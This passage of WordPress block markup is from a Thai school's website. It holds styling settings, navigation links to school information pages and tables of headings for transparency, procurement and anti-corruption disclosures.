900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":